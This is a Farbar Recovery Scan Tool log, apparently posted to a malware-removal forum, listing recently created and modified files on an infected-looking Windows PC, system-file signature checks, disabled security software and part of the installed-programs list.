2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-25 09:17 - 00039662 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-24 15:45 - 00000000 ____D () C:\Qoobox
2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-25 08:17 - 00000850 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-25 09:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-25 09:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-25 09:47 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-25 09:47 - 2014-07-18 00:39 - 01989969 _____ () C:\Windows\WindowsUpdate.log
2014-08-25 09:44 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat
2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-25 09:23 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-25 09:20 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-25 09:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-25 09:18 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-25 09:17 - 2014-08-22 16:12 - 00039662 _____ () C:\Windows\PFRO.log
2014-08-25 09:17 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-25 09:17 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-25 09:17 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system
2014-08-25 09:15 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-25 08:17 - 2014-08-22 13:25 - 00000850 _____ () C:\Windows\setupact.log
2014-08-24 15:46 - 2014-08-24 15:23 - 00000000 ____D () C:\ComboFix
2014-08-24 15:45 - 2014-08-24 15:45 - 00046297 _____ () C:\ComboFix.txt
2014-08-24 15:45 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-24 15:40 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss
2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis
2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google
2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google
2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG
2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC
2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix
2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc
2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office
2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple
2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-25 09:24
 
==================== End Of Log ============================
Link to post
Share on other sites

Addition

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-25 09:48:44
Running from G:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden
6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden
ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)
Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)
Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )
AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)
AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden
Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)
BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden
